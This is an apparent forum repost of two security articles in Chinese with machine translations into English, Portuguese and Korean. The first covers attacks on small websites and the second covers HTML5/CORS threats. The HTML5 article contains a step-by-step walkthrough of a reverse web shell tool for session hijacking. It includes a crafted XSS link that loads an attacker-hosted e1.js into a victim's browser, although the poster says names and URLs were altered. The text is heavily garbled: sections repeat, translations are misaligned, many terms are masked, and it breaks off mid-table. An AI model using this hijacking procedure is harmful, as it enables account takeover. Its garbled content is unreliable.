2013年11月最新情報~!*&"新技術新威脅-
"HTML5攻擊新手法--2013年10月22日"~!*
*USA-en*-* " Small sites - ! ! Most vulnerable
to hacker attacks in three attacks in November 2013 the latest intelligence ~ * &
" new technologies and new threats -
"HTML5 attack new tricks -October 22,2013"~!*-
*PTG(macau-FDZone)*-* " Pequenos locais - ! Mais vulneráveis a ataques de hackers em três ataques , em novembro de 2013, a mais recente inteligência ~ * &" novas tecnologias e novas ameaças - "ataque HTML5 novos truques - 22 de outubro de 2013 "~!*- -*KR*-- * " 작은 사이트 - ! ! 2013년 11월 최신 정보 ~ * & 세 공격 에서 해커의 공격 에 가장 취약 "- " HTML5 공격 새로운 트릭 - 2013년 10월 22일 "~
새로운 기술과 새로운 위협 !!*
*avast是捷克研發的殺毒軟件,
從網站上找到一篇avast關於網站安全的文章,
覺得頗有意思,因此想到翻譯過來與大家共享。
有不對之處還望大家批評指正~!*
一個擁有上萬訪問者的小型網站管理員發來一份信,
向我描述了他的遭遇,
我只能說:“你非常不幸,但是問題很常見。”
信件原文:
“一天早上,我收到很多用戶的郵件,
說他們的殺毒軟件報告稱我的網站被感染並被隔離。
我想這一定是個錯誤因為我們不是電子商務網站。
信件中只有發件人的地址和信息。
是不是有人通過這種方式想黑我的網站?”
-------------------------------------------------- -----
我想,在多數情況下,
答案肯定是“你的網站很可能淪落為一個自動化網絡的一部分,
它將使你的網站用戶遭受漏洞攻擊。 ”
-------------------------------------------------- ------
為什麼黑客喜歡攻擊小型網站?
小型網站通常不經常更新,
一般不會有人去修復惡意代碼,
這就成為黑客喜歡攻擊的原因。
黑客通過尋找沒有打補丁的頁面,
利用漏洞可以輕鬆而簡單地進行攻擊。
這些遭受攻擊的頁面在之後會成黑客對用戶---
---進行分類的工具—分成計算機有漏洞可以攻擊的用戶---
---以及難以攻擊的用戶,
這些網頁還被用來隱藏黑客的真實身份。
黑客入侵之後會關上“後門” !!
—通過給他們利用的漏洞打上補丁,
同時也製造另一個後門,
這些後門只有他們自己知道,
因此在對頁面進行漏洞測試時,
並不能檢測出其中的漏洞。
總的來說,一般網站管理員通常會遇到三種網絡攻擊情況。
1.剝面手段
這種情況一眼就能看出,
因為黑客喜歡在攻擊了網站之後,
在網站上留下信息來展示他們的技術並且嘲諷管理員。
即使網頁被刪除,這種攻擊的危害也不大。
你不會遭遇大量資金損失,
因為黑客的目的是顯示你的網站不夠安全並獲得其他黑客的認可。
這些黑客通常遵循一種規則“學習不是為了做黑客,
我們在黑客活動中學習。 ”
例如,通常有一些PVVVl來提供選擇剝面的原因。
下圖是一個發送數據的PVVV l...*
向我描述了他的遭遇,
我只能說:“你非常不幸,但是問題很常見。”
信件原文:
“一天早上,我收到很多用戶的郵件,
說他們的殺毒軟件報告稱我的網站被感染並被隔離。
我想這一定是個錯誤因為我們不是電子商務網站。
信件中只有發件人的地址和信息。
是不是有人通過這種方式想黑我的網站?”
-------------------------------------------------- -----
我想,在多數情況下,
答案肯定是“你的網站很可能淪落為一個自動化網絡的一部分,
它將使你的網站用戶遭受漏洞攻擊。 ”
-------------------------------------------------- ------
為什麼黑客喜歡攻擊小型網站?
小型網站通常不經常更新,
一般不會有人去修復惡意代碼,
這就成為黑客喜歡攻擊的原因。
黑客通過尋找沒有打補丁的頁面,
利用漏洞可以輕鬆而簡單地進行攻擊。
這些遭受攻擊的頁面在之後會成黑客對用戶---
---進行分類的工具—分成計算機有漏洞可以攻擊的用戶---
---以及難以攻擊的用戶,
這些網頁還被用來隱藏黑客的真實身份。
黑客入侵之後會關上“後門” !!
—通過給他們利用的漏洞打上補丁,
同時也製造另一個後門,
這些後門只有他們自己知道,
因此在對頁面進行漏洞測試時,
並不能檢測出其中的漏洞。
總的來說,一般網站管理員通常會遇到三種網絡攻擊情況。
1.剝面手段
這種情況一眼就能看出,
因為黑客喜歡在攻擊了網站之後,
在網站上留下信息來展示他們的技術並且嘲諷管理員。
即使網頁被刪除,這種攻擊的危害也不大。
你不會遭遇大量資金損失,
因為黑客的目的是顯示你的網站不夠安全並獲得其他黑客的認可。
這些黑客通常遵循一種規則“學習不是為了做黑客,
我們在黑客活動中學習。 ”
例如,通常有一些PVVVl來提供選擇剝面的原因。
下圖是一個發送數據的PVVV l...*
*USA-en*--avast antivirus software is developed by the Czech Republic, Avast find an article on the website security from the site, Feel quite mean, so think translated to share with everyone. Wrong if we also hope criticism. With 10,000 visitors a small site administrators sent a letter Described to me what happened to him, I can only say: "You are very unfortunate, but the problem is very common." Letters Original: "One morning I received a lot of e-mail users, That their anti-virus software reports my site was infected and was isolated. I think this must be a mistake because we are not e-commerce site. Only the sender's mail address and information. This way is not someone I want black site? "I think, in most cases, The answer is definitely "your site is likely to have been reduced to = = Part of an automation network, It will make your site users suffer exploits. " Why do hackers like to attack small site? Small sites usually do not frequently updated, Generally not someone to fix the malicious code, It became like a hacker attack causes. Hackers find unpatched page Exploit can easily and simply attack. These attacks will become a page after a hacker --- --- A tool for users to classify - into computer vulnerable --- --- Hard to attack users and users can attack These pages are also used to hide the true identity of the hacker. Will close the "back door" after hacking - --- Exploited by giving them patched While also creating another back door, These backdoors only they know, Therefore, on the pages vulnerability tests, Which can not be detected vulnerabilities. Overall, General webmasters usually encounter three network attack situation. 1 means stripping surface This case one can see, Because hackers like to attack the site after Leave a message on the site to showcase their skills and ridicule administrator. Even if the page is deleted, such attacks harm not great. You will not encounter a lot of money lost, Because hackers aim is to show your site is not safe enough - - And get recognized by other hackers. These hackers usually follow a rule - - "Do not learn to hack, We learn in hacking activities. " For example, there is usually some PVVVP l to select the stXXXp
surface provides the reason. Below is a send data PXXXP l.
*PTG(Macau)-FDZone.Fourm-*
*software antivírus avast é desenvolvido pela República Checa,Avast encontrar um artigo sobre a segurança do website a partir do site ,Sinta-se bastante média , por isso acho que traduzido para compartilhar com todos .Errado , se esperamos também críticas.Com 10.000 visitantes um pequeno administradores do site ,
enviou uma cartaDescreveu-me o que aconteceu com ele,Só posso dizer : "Você é muito lamentável ,
mas o problema é muito comum. "Cartas Original:" Certa manhã, recebi um monte de usuários de e- mail,Que o seu software anti- vírus relata meu site foi infectado e foi isolado .Eu acho que isso deve ser um erro, porque não somos e-commerce site.Apenas mail do remetente e informações.Desta forma, não é alguém que eu quero black site ?"Eu acho que , na maioria dos casos ,A resposta é definitivamente " o site é provável que tenha sido reduzida a == Parte de uma rede de automação ,Isso fará com que seus usuários do local sofrem façanhas. "Por que os hackers gostam de atacar pequeno site?Pequenos sites geralmente não atualizados com freqüência,Geralmente não alguém para corrigir o código malicioso,Tornou-se como uma causa de ataque hacker.Hackers encontrar a página sem correçãoExploit pode facilmente e simplesmente ataque.Esses ataques se tornará uma página depois de um hacker ------ Uma ferramenta para os usuários a classificar -
em computador vulnerável ------ Difícil de atacar usuários e os usuários podem atacarEstas páginas também são usados para esconder a verdadeira identidade do hacker.Vai fechar a " porta dos fundos ", depois de hackers ---- Exploited , dando-lhes remendadoEmbora também a criação de uma outra porta de trás,Estas backdoors só eles sabem ,Portanto, nos testes de vulnerabilidade páginas ,O que não pode ser detectado vulnerabilidades.Em geral ,Webmasters gerais costumam encontrar três situações de ataque de rede .Um meio de decapagem superfícieEste caso pode-se ver ,Porque os hackers gostam de atacar o site depoisDeixe uma mensagem no site para mostrar suas habilidades
e administrador ridículo .Mesmo que a página é excluída, tais ataques não prejudicar grande .Você não vai encontrar um monte de dinheiro perdido ,Porque hackers objectivo é mostrar o seu site não é seguro o suficiente -- E ser reconhecido por outros hackers.Esses hackers costumam seguir uma regra -- "Não aprender a cortar ,Aprendemos em atividades de hacking . "Por exemplo, geralmente há algum PVVVP l para selecionar a
faixa de superfície fornece a razão .Abaixo está um envio PXXXP dados l.
*KR*-*노 젓는 걸 바이러스 백신 소프트웨어 , 체코 공화국에 의해 개발노 젓는사이트에서 웹 사이트 보안에 대한 기사를 찾아 ,아주 평균 느낌 , 그래서 모든 사람들과 공유 할 수 번역 생각한다.우리는 또한 비판을 희망 하는 경우에 틀리다 .10,000 방문자와 작은 사이트 관리자는편지를 보내그에게 무슨 일이 있었는지 나에게 설명 ,"당신은 매우 불행한 일 이지만, 문제는 매우 일반적입니다. " 난 단지 말할 수있는편지 원본 :" 어느 아침 I 는 , e- 메일 사용자 많이 받았다자신의 안티 바이러스 소프트웨어 내 사이트 가 감염 되고 고립 된 보고합니다 .나는 우리가 전자 상거래 사이트를 하지 않기 때문에 이 실수 있어야합니다 생각합니다.만 보낸 사람의 메일 주소와 정보를 제공합니다.이 방법 은 내가 흑인 사이트를 원하는 사람이 아니야 ?"나는 , 대부분의 경우에 , 생각대답은 분명히 " 귀하의 사이트 는 = 로 감소 된 것 입니다자동화 네트워크의 = 부품 ,그것은 귀하의 사이트 의 사용자가 악용 고통을 것입니다. "왜 해커가 작은 사이트를 공격하기 좋아합니까 ?소규모 사이트 는 일반적으로 자주 업데이트 하지 않는 ,악성 코드 를 해결하기 위해 일반적으로 사람이 아니라 ,그것은 해커 공격 의 원인 처럼 되었다.해커는 패치되지 않은 페이지를 찾을할 수있는 쉽고 간단하게 공격 공격 .이러한 공격은 --- 해커 후 페이지 가 될 것이다--- 분류하는 사용자를위한 도구 - 컴퓨터 취약 에 ------ 하드 사용자와 사용자가 공격 할 수있는 공격이 페이지 는 해커 의 정체 를 숨기는 데 사용 됩니다.해킹 후 " 뒷문 "을 닫습니다 ---- 패치 를 제공함으로써 착취또 다른 다시 문을 작성하는 동안 ,이 백도어 는 그들이 알고 ,따라서, 페이지 취약성 테스트 에 ,취약점을 감지 할 수 있다.전반적으로,일반 웹 마스터는 일반적으로 세 가지 네트워크 공격 상황이 발생 .표면을 벗겨 1 수단이 경우는 하나 볼 수 있습니다 ,해커 후 사이트를 공격하기 좋아하기 때문에자신의 능력 과 조롱 관리자에게 선보일 수있는 사이트에 메시지를 남겨주세요 .페이지 가 삭제 된 경우에도 , 이러한 공격 은 크지 해칠 .당신은 잃어버린 돈을 많이 가 발생하지 않습니다 ,해커가 목표로 하고 있기 때문에 당신의 위치가 충분히 안전하지
않습니다 표시하는 것입니다 -- 그리고 다른 해커에 의해 인정 받을 .이 해커 는 일반적으로 규칙을 따라 -- " 해킹 을 배울 하지 마십시오 ,우리는 활동을 해킹 배운다. "예를 들어, 지구 표면을 선택 하는 몇 가지 PVVVP 의 난 이유를 제공 일반적으로 있다.다음은 전송 데이터 PXXXP 리터 입니다.*
2010年有150萬網站遭受剝面攻擊,
被黑的屏幕截圖如下圖所示顯示了攻擊的原因: *
*USA-en*-Zone-H according to the data ,2010 1.5 million websites suffer peel surface attacks,Hacked screenshot shown below shows the reason for the attack : *
*PTG(Macau)-FDZ.-*Zona - H de acordo com os dados ,2010 1,5 milhões de sites sofrer ataques de superfície da casca ,Screenshot Hacked mostrado abaixo mostra a razão para o ataque : "
*KR-*데이터에 따라 존 -H ,2010 150 만 웹 사이트는 껍질 표면 의 공격을 고통 ,아래의 스크린 샷은 해킹 공격 에 대한 이유를 보여줍니다 : "**
*過去幾年中,剝面攻擊通常被一些黑客---
---用來展示政治和宗教意圖。即使是反病毒公司也難以倖免,
比如adobe公司此前的數據洩露事件以及---
---Avast公司前段時間遭受的攻擊。
2.資料探勘
資料探勘攻擊的意圖通常是竊取用戶的私人信息
和存儲在各種服務中的認證信息,
通常來講電子商務網站、論壇、
網絡遊戲容易受到類似攻擊。
這些被竊取的數據通常被用作廣告意圖或者銀行詐騙。
資料探勘很難被發覺,
因為這種攻擊速度通常很快,
唯一的跡象就是大規模的數據流出---
--這是黑客在下載數據庫。
通常來講保護私人數據的最基礎技巧就是加密。
如果密碼、信用卡和電話號碼加密存儲,
那麼黑客就需要知道源碼才能破解,
因此可以降低黑客攻擊的成功率。
另外,通過使用第三方認證服務也可以---
---為用戶數據提供更高級別的保護。
但是沒有一家公司能夠完全避免黑客攻擊。
一個例子就是adobe公司3800萬用戶數據被盜的案例。
或許這些源碼回流落到不法分子手中。
---------------------------------------
3.漏洞攻擊及其網絡
漏洞攻擊指利用一系列漏洞測試和
利用工具對網站用戶的瀏覽數據進行攻擊,
在其中執行惡意代碼。
存在惡意代碼的網站被稱作“著陸頁面”。
為了獲取用戶通信,
漏洞攻擊者通過小型網頁創立網絡,
就像開頭郵件中提到的那樣。
他們的目的是轉髮用戶的瀏覽數據而不被察覺,
因此被感染的網頁不會顯示任何異樣。
下圖顯示了最近一次針對廣告服務器發起的---
---攻擊中使用的轉發腳本:
*USA-en-*Over the past few years, Peel surface attack is often used to demonstrate some hackers political and religious intent. Even the anti-virus companies are spared, For example, the company had adobe data breaches --- --- Avast company some time ago and suffered attacks. 2 Data Mining Data mining is often attacked intent to steal users --- --- Authentication information stored in a variety of private information and services, and Generally e-commerce sites, forums, Online game vulnerable to similar attacks. These data are often stolen for advertising --- --- Intent or bank fraud. Data mining is difficult to find, Because this attack speed is usually very fast, The only sign that a massive outflow of data - this is a hacker downloaded database. Generally the most basic skills to protect private data is encrypted. If passwords, credit card and telephone numbers stored encrypted, So the hacker needs to know the source code to crack, Therefore, the success rate can be reduced hacking. In addition, through the use of third-party certification services --- --- You can also provide a higher level of protection for user data. But no company can completely avoid hacker attacks. One example is the adobe company 38 million user data theft case. Perhaps these codes fall into the wrong hands reflux. 3 exploits its network Means using a series of exploits vulnerability testing and --- --- Use tools for website users' browsing data to attack, In which the execution of malicious code. Malicious code website called "landing page." In order to obtain user communication, Vulnerability an attacker created a network through a small website As mentioned at the beginning of the message. Their aim is to forward the user's browsing data without being detected, Therefore, infected web page does not display any strange. The following figure shows the last script forwarding attacks
launched against the ad server used:
*RTG(Macau)-FDZ-*Ao longo dos últimos anos ,Peel superfície de ataque é muitas vezes usado para demonstrar alguns hackers intenção política e religiosa.Mesmo as empresas de anti-vírus são poupados ,Por exemplo , a empresa tinha violações de dados adobe ------ Avast empresa há algum tempo e ataques sofridos .2 Data MiningA mineração de dados é muitas vezes atacado intenção de roubar usuários ------ As informações de autenticação armazenadas em uma variedade de informações e serviços privados eGeralmente sites de e-commerce, fóruns,Jogo online vulnerável a ataques semelhantes .Estes dados são muitas vezes roubados para publicidade ------ Intenção ou fraude bancária .A mineração de dados é difícil de encontrar,Porque esta velocidade de ataque é geralmente muito rápido,O único sinal de que uma saída maciça de dados - este é um hacker baixado banco de dados.Geralmente as habilidades mais básicas para proteger dados privados são criptografados.Se os números de senhas , cartões de crédito e de telefone armazenados criptografados,Assim, o hacker precisa conhecer o código fonte de crack ,Portanto, a taxa de sucesso pode ser reduzido a pirataria .Além disso, através do uso de serviços de certificação de terceiros ------ Você também pode fornecer um maior nível de proteção para os dados do usuário .Mas nenhuma empresa pode evitar completamente ataques de hackers.Um exemplo é a empresa adobe caso de roubo de dados de 38 milhões de usuários.Talvez esses códigos cair em mãos erradas refluxo.3 explora sua redeSignifica usar uma série de testes de vulnerabilidade de exploits e ------ Use ferramentas para dados de navegação dos usuários do site para o ataque ,Em que a execução de código malicioso.Site O código malicioso chamado de " página de destino. "A fim de obter a comunicação de utilizador ,Vulnerabilidade um invasor criar uma rede através de um pequeno siteConforme mencionado no início da mensagem .Seu objetivo é o envio de dados de navegação do usuário sem ser detectado ,Portanto, a página web infectada não apresenta qualquer estranho .A figura a seguir mostra os últimos ataques de encaminhamento
roteiro lançados contra o servidor de anúncios utilizados:
*KR-*지난 몇 년 동안 ,껍질 표면 의 공격 은 종종 일부 해커 에게 정치적, 종교적인 의미 를 설명하는 데 사용 됩니다.심지어 안티 바이러스 회사 가 절약 되고,예를 들어 ,이 회사는 --- 어도비 데이터 유출 했다--- 노 젓는 걸 얼마 전에 회사와 고통을 공격 .2 데이터 마이닝데이터 마이닝 은 종종 --- 사용자를 훔칠 의도를 공격--- 인증 개인 정보 및 다양한 서비스 에 저장된 정보,일반적으로 전자 상거래 사이트 , 포럼,유사한 공격에 취약 온라인 게임 .이러한 데이터 는 종종 광고 도난 ------ 의도 또는 은행 사기 .데이터 마이닝은 찾기가 어렵습니다이 공격 속도 는 일반적으로 매우 빠르기 때문에데이터 의 대규모 유출 이 유일한 기호 - 이 해커 입니다 데이터베이스 를 다운로드 할 수 있습니다.일반적으로 개인 데이터를 보호하는가장 기본적인 기술 은 암호화된다.암호, 신용 카드와 전화 번호 가 암호화되어 저장 하면 ,따라서해커는 균열소스 코드를 알 필요따라서성공률 해킹 을 저감 할 수있다 .또한, 타사 인증 서비스를 이용하여 ------ 또한 사용자 데이터에 대한 높은 수준의 보호 를 제공 할 수있다.하지만 이 회사는 완전히 해커의 공격 을 피할 수 있습니다.한 예는 Adobe 사의 3800 만 사용자 의 데이터 도난 케이스입니다.아마도 이러한 코드 가 잘못된 손에 역류 에 속합니다.3 네트워크를 활용공격 취약성 테스트 의시리즈 를 사용 하고 --- 수단--- 공격에 웹 사이트 사용자의 검색 데이터를 사용하는 도구 를 ,어떤 악성 코드 의 실행 합니다." 시작 페이지 "라고합니다. 악성 코드 웹 사이트사용자 통신을 얻기 위해서는취약점공격자는소규모 웹 사이트를 통해네트워크를 만들어메시지의시작 부분에서 언급 한 바와 같이 .그들의 목표 는 감지되지 않고 사용자의 인터넷 사용 정보 를 전달 하는 것입니다 ,따라서 , 감염된 웹 페이지는 이상한 표시되지 않습니다.다음 그림 은 사용 된 광고 서버에 대해 실행 의 마지막 스크립트
포워딩 공격을 보여줍니다 : *
成為漏洞攻擊群網絡的網頁會出現以下嚴重後果:
·網頁排名急速下降
·聲譽網站和殺毒軟件公司將網頁加入黑名單
·用戶將受到惡意軟件的感染
·用戶對網站的信任度下降
*!為了防止這種情況出現,我們建議:
·升級CMS系統和插件
·修改默認的管理員用戶名和密碼
·使用安全公司的產品保護網站
·通過SFTP而不是FTP進行傳輸. *
*USA-en-*Become a group exploits the following web page
will appear serious consequences :· Page Rank rapid decline· Reputation of websites and web anti-virus software companies will blacklist· Users will be infected with malware· Users of the decline in trust website@ - In order to prevent this happening , we recommend :· Upgrade MMMS system and plug· Modify the default administrator username and password• Use secure websites to protect the company's products· Not transmitted via FTP SFTP !!
========================================*PTG(Macau)-FDZ.-*Torne-se um grupo explora a seguinte página web aparecerá consequências graves :· Page Rank rápido declínio· Reputação de sites e empresas de software web anti- vírus vai barrar· Os usuários serão infectados com malware· Os usuários do declínio no website confiança@ - A fim de evitar que isso aconteça , recomendamos:· Atualizar sistema MMMS e plugue· Modifique o nome de usuário e senha padrão do administrador• Use sites seguros para proteger os produtos da empresa· Não transmitido via FTP SFTP======================================
*KR-*그룹 이 될 것은 다음과 같은 웹 페이지가 심각한 결과 를 나타납니다 활용 :· 페이지 순위 급감· 웹 사이트 및 웹 안티 바이러스 소프트웨어 회사 의 평판 블랙리스트 됩니다· 사용자 가 악성 코드 에 감염 될 것입니다· 신뢰 의 웹 사이트 에있는 쇠퇴 의 사용자@ - 이런 일 을 방지 하기 위해, 우리는 추천 :· MMMS 시스템과 플러그를 업그레이드· 기본 관리자 사용자 이름과 암호를 수정• 회사의 제품 을 보호하기 위해 보안 웹 사이트 를 사용하여· FTP SFTP 를 통해 전송 되지 않음 !!
=========================================
*"新技術新威脅-"HTML5攻擊新手法--2013年10月22日"~!
HTML5 是下一代的HTML,
HTML5賦予網頁更好的意義和結構。
更加豐富的標籤將隨著對QQFa的,
微數據與微格式等方面的支持,
構建對程序、對用戶都更有價值的數據驅動的Web。
基於HTML5開發的網頁APP擁有更短的啟動時間,
更快的聯網速度。
*本文詳細介紹了HTML5的普及,帶來的新的安全威脅~!*
一、CXXX(XXXs-Og) 跨域資源共享
為了構建高品質的網站,
以及滿足日益增長的用戶需求,
HTML5針對S----yP(同源MM略)放寬了一些限制,
簡單的說,同源策略允許來自同一站點的---
---頁面訪問其頁面的方法和屬性等,
但限制了跨域調用其他頁面的方法和屬性。
現在HTML5放寬了這些限制,
XMLHtst Level 2新增了功能KKKS協議,
允許Ajax發起跨域的請求,
瀏覽器是可以發起跨域請求的,
比如你可以外鏈一個外域的圖片或者腳本。
但是Javascript腳本是不能獲取這些資源的內容的,
它只能被瀏覽器執行或渲染。
CXXX是頁面層次的控制模式。
每一個頁面需要返回一個名為--
--‘FFFl-Aln’的HTTP頭---
---來允許外域的站點訪問。
你可以僅僅暴露有限的資源
和有限的外域站點訪問。
在CXXX模式中,
訪問控制的職責可以放到頁面開發者的手中,
而不是服務器管理員。
當然頁面開發者需要寫專門的處理代碼來允許被外域訪問。
所以只要b.com允許,
a.com可以使用ax獲取A上任意數據,
國外安全研究者LCCCr開發了一款工具“l of te fjjjre”!!
l of te Foooe 是一個反向Web Shell處理工具
(UUUUr)。
利用跨站腳本攻擊或
瀏覽器地址欄注入javascript以後,
l of the AAAre可進行劫持會話。
它利用了HTML5支持的WWWWWns,
可以繞過一些反會話劫持的方法,
如HTTP-Only限制的cookie,幫定IP地址的會話ID。
如何使用該工具:
1)、下載並解壓該工具,
雙擊“l of te ooo.e”,會彈出一個窗口。*
**USA-en-*Over the past few years,Peel surface attack is often used to demonstrate some hackers political and religious intent.Even the anti-virus companies are spared ,For example, the company had adobe data breaches ------ Avast company some time ago and suffered attacks.2 Data MiningData mining is often attacked intent to steal users ------ Authentication information stored in a variety of private information and services , andGenerally e-commerce sites , forums,Online game vulnerable to similar attacks .These data are often stolen for advertising ------ Intent or bank fraud.Data mining is difficult to find ,Because this attack speed is usually very fast,The only sign that a massive outflow of data - this is a hacker downloaded database.Generally the most basic skills to protect private data is encrypted.If passwords, credit card and telephone numbers stored encrypted ,So the hacker needs to know the source code to crack ,Therefore, the success rate can be reduced hacking .In addition , through the use of third-party certification services ------ You can also provide a higher level of protection for user data.But no company can completely avoid hacker attacks.One example is the adobe company 38 million user data theft case.Perhaps these codes fall into the wrong hands reflux .3 exploits its networkMeans using a series of exploits vulnerability testing and ------ Use tools for website users' browsing data to attack,In which the execution of malicious code.Malicious code website called " landing page ."In order to obtain user communication ,Vulnerability an attacker created a network through a small websiteAs mentioned at the beginning of the message .Their aim is to forward the user's browsing data without being detected,Therefore, infected web page does not display any strange.The following figure shows the last script forwarding attacks launched against the ad server used : *
**PTG(Macau)-FDZone-*HTML5 é a próxima geração de HTML,HTML5 página dado significado e estrutura melhor.A etiqueta será mais rica com o RD, oMicrodados e microformats e outros apoios ,Construa o programa ,Os usuários são mais valiosos para a Web baseado em dados.Baseado em HTML5 AJJJ desenvolvimento web tem um tempo de inicialização mais curto,Velocidades mais rápidas de rede.Este artigo descreve a popularidade do HTML5, traz novas ameaças de segurança.A, (III ) recursos do domínio SPara construir sites de alta qualidade ,E para atender às crescentes necessidades dos usuários ,HTML5 para S ( política de mesma origem ) relaxou algumas restrições ,Simplificando, a partir da política de mesma origem para permitir que o site ------ De page views e outros métodos e propriedades de suas páginas,Mas limitar o cross-domain chamadas para métodos de outras páginas e propriedades.HTML5 agora relaxar as restrições ,XMLest Le adicionou recursos de acordo CMMMX iniciou o pedido para permitir cross-domain ,Navegador pode iniciar pedido cross-domain ,Por exemplo, você pode fora da cadeia fora do domínio de uma imagem ou script.Mas o roteiro não é o conteúdo get Javascript desses recursos ,Ela só pode ser executado ou prestado browser.CMMM é um modo de controle de nível de página .Cada página precisa retornar o cabeçalho HTTP chamado " ACN " de ------ Para permitir o acesso a sites fora do domínio.Você só pode expor recursos limitados e ------ Outland limitado acesso ao site.No modo CMMM ,Funções de controle de acesso pode ser colocada nas mãos da página do desenvolvedor,Ao invés de o administrador do servidor .Naturalmente, os desenvolvedores de páginas precisa escrever código especial para permitir o processamento para ser acessado fora do domínio.Enquanto b.com permitido ,a.com pode usar x para obter todos os dados em A,Pesquisadores de segurança Exterior MMMr desenvolveu uma ferramenta de " pppp " .LLLL é um reverso ferramentas de processamento Webl ( MMM ) .O uso de ataques de cross-site scripting ouApós injetar o endereço do navegador bar javascript ,LLLL pode seqüestrar a sessão.Ela tira proveito do HTML5 apoio CMMM ,Alguns métodos podem ignorar anti- seqüestro de sessão,Tal como bolinho limite HTTP- YYY , para ajudar a definir o endereço IP de identificação de sessão .Como usar esta ferramenta:1 , baixe e descompacte a ferramenta ,Clique duas vezes no " CMMM , uma janela irá aparecer.
*KR-*지난 몇 년 동안 ,껍질 표면 의 공격 은 종종 일부 해커 에게 정치적, 종교적인 의미 를 설명하는 데 사용 됩니다.심지어 안티 바이러스 회사 가 절약 되고,예를 들어 ,이 회사는 --- 어도비 데이터 유출 했다--- 노 젓는 걸 얼마 전에 회사와 고통을 공격 .2 데이터 마이닝데이터 마이닝 은 종종 --- 사용자를 훔칠 의도를 공격--- 인증 개인 정보 및 다양한 서비스 에 저장된 정보,일반적으로 전자 상거래 사이트 , 포럼,유사한 공격에 취약 온라인 게임 .이러한 데이터 는 종종 광고 도난 ------ 의도 또는 은행 사기 .데이터 마이닝은 찾기가 어렵습니다이 공격 속도 는 일반적으로 매우 빠르기 때문에데이터 의 대규모 유출 이 유일한 기호 - 이 해커 입니다 데이터베이스 를 다운로드 할 수 있습니다.일반적으로 개인 데이터를 보호하는가장 기본적인 기술 은 암호화된다.암호, 신용 카드와 전화 번호 가 암호화되어 저장 하면 ,따라서해커는 균열소스 코드를 알 필요따라서성공률 해킹 을 저감 할 수있다 .또한, 타사 인증 서비스를 이용하여 ------ 또한 사용자 데이터에 대한 높은 수준의 보호 를 제공 할 수있다.하지만 이 회사는 완전히 해커의 공격 을 피할 수 있습니다.한 예는 Adobe 사의 3800 만 사용자 의 데이터 도난 케이스입니다.아마도 이러한 코드 가 잘못된 손에 역류 에 속합니다.3 네트워크를 활용공격 취약성 테스트 의시리즈 를 사용 하고 --- 수단--- 공격에 웹 사이트 사용자의 검색 데이터를 사용하는 도구 를 ,어떤 악성 코드 의 실행 합니다." 시작 페이지 "라고합니다. 악성 코드 웹 사이트사용자 통신을 얻기 위해서는취약점공격자는소규모 웹 사이트를 통해네트워크를 만들어메시지의시작 부분에서 언급 한 바와 같이 .그들의 목표 는 감지되지 않고 사용자의 인터넷 사용 정보 를 전달 하는 것입니다 ,따라서 , 감염된 웹 페이지는 이상한 표시되지 않습니다.다음 그림 은 사용 된 광고 서버에 대해 실행 의 마지막 스크립트
포워딩 공격을 보여줍니다 : **
*2、輸入任意端口,點擊“Start”。
3、使用瀏覽器訪問--http://1.0./sle (uuu效果最佳)
4、不出問題,你將看到以下畫面。
(Se有兩個JavaScript的
exp- e1.js和e2.js .
我們可以利用XXXX漏洞將其嵌入到受害者的瀏覽器)
*USA-en-*
2, enter any port , click "Start".3 , using a browser to access http://1sole (JJJ best )4 , no problem , you will see the following screen .(LLLL two JavaScript in ep-e1.s and 2.s,We can use XCCC vulnerability embed the victim's browser )
*PTG(Macau)-FDZ.-*2 , entrar em qualquer porta, clique em "Start" .3 , usando um navegador para acessar http://1sole ( JJJ melhor )4 , não há problema , você verá a tela seguinte.( LLLL dois JavaScript no ep- e1.s e 2.s ,Podemos usar a vulnerabilidade XCCC incorporar navegador da vítima )
*KR-*2, 어떤 포트를 입력, "시작"을 클릭합니다. 3, http://1sole에 액세스 할 수 브라우저를 사용하여 (JJJ 최고) 4, 문제, 다음과 같은 화면을 볼 수 없습니다. (LLLL 두 EP-e1.s 및 2.S에있는 자바 스크립트, 우리는) XCCC 취약점이 피해자의 브라우저를 포함 사용할 수 있습니다 ~!
---------------------------------------------------------------
* *
*5、當一個用戶登錄下面的測試網站:
http://www.YYYYn.aspx(管理員/管理員)
該站點的搜索功能粗在一個XXXX漏洞,-->http://wWW.HHH.KKKK.
6、攻擊者發送一個惡意鏈接給用戶,如下:
http://www.YYYYN.net/sex?tript%7src=%FFhttp://12.NNN.1:#9328/e1.js%BB%=E
7、當用戶點擊之後,攻擊者的IP地址將會發送給攻擊者,然後點擊“Hijack IIIn”:
*USA-en-*5, when a user logs in the following test sites: http://www.tiiie.net/kkkk/login.px (Admin / Admin) The site's search function in a crude XXX vulnerability, http://www.SEXXX.net/sich.aspx?tt% t # 9328% 2FsXXXt% BBB 6, the attacker sends a malicious link to the user, as follows: http://www.SEXXX.net/sich.aspx?tt% t # 9328% 2FsXXXt% BBB 7, when the user clicks, The attacker's IP address will be sent to the attacker, Then click "Hijack SXXX": *PTA(Macau)-FDZone-*5, quando um usuário faz nos seguintes locais de teste: http://www.tiiie.net/kkkk/login.px (Admin / Admin) Função de busca do site de uma vulnerabilidade XXX bruto, http://www.SEXXX.net/sich.aspx?tt% t # 9328% 2FsXXXt% BBB 6, o atacante envia um link malicioso para o usuário, como segue: http://www.SEXXX.net/sich.aspx?tt% t # 9328% 2FsXXXt% BBB 7, quando o usuário clica, O endereço IP do atacante será enviado para o atacante, Em seguida, clique em "Hijack SXXX": *KR-*5, 다음 테스트 사이트에서 사용자가 로그온 할 때 : http://www.tiiie.net/kkkk/login.px (관리자 / 관리자) 원유 XXX 취약점의 사이트의 검색 기능, http://www.SEXXX.net/sich.aspx?tt %의 T 번호 9,328%의 2FsXXXt %의 BBB 6 다음과 같이 공격자는 사용자에게 악의적 인 링크를 보냅니다 http://www.SEXXX.net/sich.aspx?tt %의 T 번호 9,328퍼센트의 2FsXXXt %의 BBB 7, 사용자가 클릭 할 때, 침입자의 IP 주소가 공격자에게 보내질 것이다 그런 다음 "공중 납치 SXXX"을 클릭합니다 : * *8、點擊Hijack SeeeXXXX之後,將出現如下畫面:
*註 : 所有本文章均為範例[我已修改了全部"名詞"及"網址"/"指令碼"
以下是幾種HTML5功能與可能發生的安全威脅整理表:
類型-說明
可能問題與AHHHk vs
Web Storage
Local Storage:是採取YYY規則(sameFFFy)的保護法
GGGn Storage:只要瀏覽頁面關閉即刪除
SXXX hijacking:連線劫持,
取得sVVVge中的連線管理資訊,並劫持之。
UUUe of MMMial Data:
資敏資料外露,取得storage中存放的資料。
User oooing:在storage中置放追蹤用戶行為的資訊。
PRRRRt Attack:
把攻擊程式放置於storage中,
